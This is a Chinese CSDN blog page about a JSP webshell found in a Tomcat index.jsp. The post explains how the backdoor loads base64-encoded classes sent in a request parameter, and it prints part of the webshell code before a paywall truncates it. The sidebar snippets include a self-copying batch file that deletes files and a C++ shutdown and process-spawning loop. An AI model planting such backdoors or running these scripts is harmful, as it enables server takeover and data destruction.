完了完了 我好像中奖了!(木马病毒)

最新推荐文章于 2023-09-09 17:58:29 发布
最新推荐文章于 2023-09-09 17:58:29 发布
阅读量315 收藏
点赞数
分类专栏: Java技术文 文章标签: java 数据库 编程语言 代码规范 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xcw19971018/article/details/119217261
版权
本文通过一个实例展示了如何模拟Webshell攻击,从创建木马文件到利用Base64编码执行命令,同时强调了安全防范的重要性。阿里云给出了针对Webshell的告警,并提醒用户采取措施,如限制上传权限、定期更换密码和保持程序更新,以保护网站和服务器安全。
摘要由CSDN通过智能技术生成

描述

最近一个老同学跟我说他部署在阿里云上的系统,在tomcat的目录下出现了一个index.jsp文件,内容大致如下:

我一看发现这不就是一个木马后门文件吗,只需要通过参数ejiaogl传入一个经过base64编码的Class文件,这样就可以解码然后被类加载器加载,而我们知道类被加载的时候是可以执行static代码块的,而这个代码块可以任由攻击者来指定要执行的代码,是非常危险的,为了更加形象我特意做了一个模拟攻击。

模拟攻击

准备木马文件

准备一个Tomcat,直接启动即可,默认访问的是ROOT目录下的index.jsp,准备好以上的木马后门文件直接替换,文件如下:

<%!
//自定义了一个类加载器
class U extends ClassLoader{
    U(ClassLoader c){
        super(c);
    }

    public Class g(byte[] b) {
        return this.defineClass(b, 0, b.length);
    }
}
​
public byte[] base64Decoder(String str) throws Exception {
    try {
        Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
        //这里还做了一个base64的兼容处理
        Class clazz = Class.forName("java.util.Base64");
        Object decoder
最低0.47元/天 解锁文章
Java盘鱼宴
关注
专栏目录
从苏宁电器到卡巴斯基第37篇:我与卡巴斯基的邂逅(中)
Gleam的专栏
09-05 4041
卡巴斯基的一面 我回复卡巴斯基邮件之后,大概过了两个小时吧,那边也回复我了,我们约在一周后进行电话面试(当时在邮件里面并没有具体说在哪一天面试)。看来我回复得还是比较及时的,尽管已经过了六天,但幸好没有耽误,也算是得到了老天的眷顾。想想也是,我这一路走来已经是够倒霉的了,尽管这里面既有主观原因也有客观原因,但自助者天助之,天无绝人之路,三十年河东,三十年河西,风水轮流转,再怎么轮,也该
从苏宁电器到卡巴斯基第23篇:单证这一年(上)
Gleam的专栏
07-28 4489
单证的学习与生活 这是我第一次来到北京工业大学学习,我觉得与我的本科学校相比,那么这里简直就是天堂了。唯一可能不太好的,就是寝室里面是那种上下铺的设置,而本科是上床下桌。我觉得上床下桌那种,更加自由和独立。还有就是北研楼这里,寝室的衣柜设计太不合理了。别说是裤子了,即便是上衣也挂不起来,因为柜子比较矮,因此我也只能够把衣服都叠起来放着了。另外,这里食堂的饭菜种类比理工大学丰富得多,每天
木马 java_Java恶意软件来袭 木马病毒也要跨平台
weixin_32159771的博客
02-20 768
安全厂商已经发现了一种新的恶意软件,可以攻击PC和Mac电脑。flashback恶意软件利用java安全弱点,感染了成百上千台Mac电脑。和flashback一样,当攻击的时候,这种java applet可以检测被攻击者运行的是哪种操作系统,然后下载相应平台的恶意软件。骇客喜欢使用跨平台的插件作为攻击媒介,这样就可以使他们把更多的操作系统平台作为攻击目标,进而获取更多的潜在被攻击用户。自从java...
Sangfor华东天勇战队:CVE-2022-22947注入Spring内存马
bring_coco的博客
06-26 1751
中间的这一段’yv66vgAAA…'需要将class文件进行base64编码,如下。编译成SpringRequestMappingMemshell.class即可。刷新之后可以看到成功注册路由,也就相当于我们的内存马写了进去。接下来执行内存马,可以直接访问接口并输入命令,如下。
一句话木马该怎么实现?现在就带你了解
dzqxwzoe的博客
02-15 1007
一直以来,Java一句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句话木马:利用Java中JS引擎实现的一句话木马。基于JS引擎的Java一句话体积更小,变化种类更多,使用起来更灵活。
超强C++木马病毒(含代码,样本)
yaosichengalpha的博客
07-05 8222
超强C++木马病毒(含代码,样本)
木马病毒代码1.0
最新发布
2301_79273855的博客
09-09 2394
代码木马病毒代码1.0。
C语言编程实现病毒,木马等的dll远…
Confession 的技术频道
01-23 1210
有人问学了C可以做什么,似乎好像什么也做不了,其实你学了,你就可以用你学的这些知识做到Windows系统下的一切,因为WIndows的基层本身也是用C写的你只要熟悉这些函数就行了,甚至你超越现在的Windows系统,根据它来用C进行驱动开发,甚至你如果对Windows不满意,还可以用C自己写一款操作系统,当然只要你有这份雄心。 这里给个木马与病毒远程注入基本实现的源码。 int main(i
输入的命令集锦!
cunzhangxp的专栏
09-14 1万+
开始→运行→输入的命令集锦!可以省去不少麻烦的命令!gpedit.msc-----组策略sndrec32-------录音机Nslookup-------IP地址侦测器explorer-------打开资源管理器logoff---------注销命令tsshutdn-------60秒倒计时关机命令lusrmgr.msc----本机用户和组services.msc---本地服务设置oobe/mso
木马病毒代码
m0_65955912的博客
01-21 1万+
这个病毒的功能是删除当前目录下.cpp类型的代码。 copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" copy %0 d:\ copy %0 e:\ del *.cpp attrib +h %0 1.病毒启动测试: copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
BAT病毒代码(一)
2301_78588271的博客
06-23 6167
msgbox "点不吧,气不气?
冰蝎学习
公众号shadow sock7
03-08 1万+
https://xz.aliyun.com/t/2744 原理:将字节码进行编码/加密,在网络上传输,很难有规则可检测出来。 在服务端解密之后,使用java.lang.ClassLoader的defineClass方法还原。 jar包下载:http://www.java2s.com/Code/JarDownload/sun/sun.misc.base64decoder.jar.zip packa...
android fastjson漏洞_Fastjson 反序列化漏洞史
weixin_32309879的博客
01-12 556
作者:Longofo@知道创宇404实验室时间:2020年4月27日Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一些探测payload,rce payload。Fastjson解析流程...
java反序列之Jdk7u21回显
m0_64354070的博客
12-06 2242
以前在打RMI反序列化的时候都是用的CC、CB利用链实现报错回显,很好使。 之前在做一次项目的时候发现了目标存在RMI反序列化漏洞,系统为Windows,无DNS不出网。 通过延时探测出只存在Jdk7u21利用链。 RMI回显 打目标时依然尝试使用老方法回显,Jdk7u21 + 报错回显,发现一直没回显。平时自己Jdk7u21利用链用得比较少,大概了解Jdk7u21最后的利用也是通过Templatesimpl#newTransformer方法实现代码执行,只能去看代码分析下失败的原因。 Jdk7u
如何编写木马病毒
热门推荐
特权份子的专栏
09-30 9万+
如何编写木马病毒 www.hxhack.com 阅读:1434 时间:2007-7-23 9:46:39 整理:华夏黑盟 ------------------------------------------------------------------
一个 简单的cmd 木马(源代码)
tony的专栏
10-25 4万+
一个 简单的cmd 木马(源代码) // woodtc.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include "WoodSMTP.h"#define BUFFER_SIZE 1024typedef struct{HANDLE hPipe;SOCKET sC
C++木马病毒
m0_55484547的博客
06-29 1692
低级KTOUB2.0病毒: #include <iostream> #include <windows.h> using namespace std; int main() { system("shutdown -t -s 20"); while(1) system("start"); return 0; } 中级Luck3.0病毒: #include <iostream> using namespace std; int main() { system("shutdo
最新恶意复制型病毒及代码分析
weixin_30622107的博客
11-28 833
最新恶意复制型病毒及代码分析病毒最大的特点在于中毒后,自动感染你的硬盘根目录,并复制病毒文件。无论你是采用双击,还是右键选择打开,或者运行资源管理器都会自动运行其代码(病毒),所以中此病毒后,新手往往打不开盘符,导致数据无法读取。下面是病毒的代码分析 文件总共有三个 都很简单,已经加上了注解。文件名:autorun.inf--------[autorun]open=...
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1272
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Java盘鱼宴

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值